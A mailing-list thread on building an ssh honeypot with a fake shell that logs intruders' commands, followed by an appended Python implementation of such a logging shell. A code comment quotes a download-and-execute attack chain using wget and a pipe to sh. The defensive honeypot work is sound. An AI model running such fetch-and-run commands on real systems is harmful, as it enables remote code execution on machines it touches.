On 1/23/2008 9:13 PM, David Brown wrote:
> On Wed, Jan 23, 2008 at 06:27:33PM -0800, James G. Sack (jim) wrote:
>> So, a "fake shell prompt" is maybe a little like a honeypot, except that
>> commands get logged but not executed?
>
> Depends on how much I want to find out. Most likely, it is something being
> scripted on their end, so I could see what it does, and start coding up
> stuff that looked more and more like what it was looking for. It is
> probably looking for programs with known root exploits.
>
>> If so, how would you go about doing that?
>
> Hmm. Well, it'd be running inside of a VM, just so I could blow it all
> away when I was done.
>
> I'd build ssh from source, and start by logging the passwords they were
> trying. Then I'd hack the ssh to accept their logins, but have it invoke
> my special shell instead of a normal shell. It would print a shell prompt,
> but then just log. Depending on how ambitious I got, I could parse their
> commands and start faking those programs as well. Then do reading to see
> if I could find out about the exploits, and make sure that my real machines
> were current enough.
I'm running all my sshd on non-standard ports and I get no attempts
against it. Looks like I'm missing out on all the fun.
Karl
--
[email protected]
http://www.kernel-panic.org/cgi-bin/mailman/listinfo/kplug-list
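The "special shell" David describes above, as an added example that is not part of the thread: a Python program meant to be installed as the login shell of a throwaway account on a throwaway VM. It prints a prompt, logs every line the client sends, answers a few recon commands with canned output so a script keeps going, and never executes anything. The prompt string, the canned `uname`/`id`/`w` output, the `FAKESHELL_LOG` environment variable and the sample command lines in `run_session` are all constructed placeholders, not output of any real host; the sshd change that accepts any password is the part of his plan this does not cover.

```python
#!/usr/bin/env python3
"""Minimal logging fake shell for an ssh honeypot (added example).

Every input line is recorded; a handful of commands get canned replies so
an attacker's script does not bail out at the first prompt. Nothing is
ever passed to a real shell or to the OS.
"""
import io
import json
import os
import re
import shlex
import sys
import time

# Canned replies for the commands a scripted login usually runs first.
# These strings are constructed placeholders (assumption), not real output.
CANNED = {
    "uname": "Linux honey 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST 2007 i686 GNU/Linux",
    "id": "uid=0(root) gid=0(root) groups=0(root)",
    "whoami": "root",
    "pwd": "/root",
    "hostname": "honey",
    "ls": "",   # an empty home directory is believable and costs nothing
    "w": " 21:13:07 up 3 days,  1:02,  1 user,  load average: 0.00, 0.00, 0.00",
}
SILENT_OK = {"cd", "export", "unset"}       # pretend these succeed quietly
EXIT_COMMANDS = {"exit", "logout", "quit"}

# Split "cd /tmp; wget http://x/a && ./a | sh" into its pieces so each
# command is logged separately. Approximate: ignores quoting of ; | &.
_SPLIT = re.compile(r"\s*(?:&&|\|\||[;|])\s*")


class FakeShell:
    def __init__(self, prompt="[root@honey ~]# "):
        self.prompt = prompt
        self.log = []          # one dict per command seen
        self.running = True

    def _record(self, text, argv, handled):
        self.log.append({"ts": time.time(), "line": text,
                         "argv": argv, "handled": handled})

    def handle(self, line):
        """Process one input line; return the text to send back (may be '')."""
        line = line.rstrip("\r\n")
        outputs = []
        for piece in filter(None, _SPLIT.split(line)):
            try:
                argv = shlex.split(piece)
            except ValueError:          # unbalanced quotes: log raw, say nothing
                self._record(piece, [], False)
                continue
            if not argv:
                continue
            cmd = argv[0]
            if cmd in EXIT_COMMANDS:
                self._record(piece, argv, True)
                self.running = False
                outputs.append("logout")
                break
            if cmd in CANNED:
                self._record(piece, argv, True)
                outputs.append(CANNED[cmd])
            elif cmd in SILENT_OK:
                self._record(piece, argv, True)
            else:
                # Unhandled commands are the "what to fake next" list.
                self._record(piece, argv, False)
                outputs.append("-bash: %s: command not found" % cmd)
        return "\n".join(o for o in outputs if o)

    def run(self, inp=sys.stdin, out=sys.stdout):
        """Prompt/read/reply loop; ends on exit command or closed connection."""
        while self.running:
            out.write(self.prompt)
            out.flush()
            line = inp.readline()
            if not line:
                break
            reply = self.handle(line)
            if reply:
                out.write(reply + "\n")
        return self.log


def run_session(lines):
    """Drive a FakeShell with constructed input lines; returns (transcript, log)."""
    inp = io.StringIO("".join(l + "\n" for l in lines))
    out = io.StringIO()
    shell = FakeShell()
    shell.run(inp, out)
    return out.getvalue(), shell.log


if __name__ == "__main__":
    shell = FakeShell()
    try:
        shell.run()
    finally:   # append the session as JSON lines, path is an assumption
        with open(os.environ.get("FAKESHELL_LOG", "fakeshell.jsonl"), "a") as f:
            for entry in shell.log:
                f.write(json.dumps(entry) + "\n")
```

To wire it in, make the file executable and set it as the account's shell (`usermod -s /path/to/fakeshell.py honey`); the log then tells you which commands came back as "command not found", which is exactly the list to add canned replies for next. The `_SPLIT` regex is deliberately crude: it only has to separate pieces for logging, not interpret them, and a mis-split still ends up in the log verbatim.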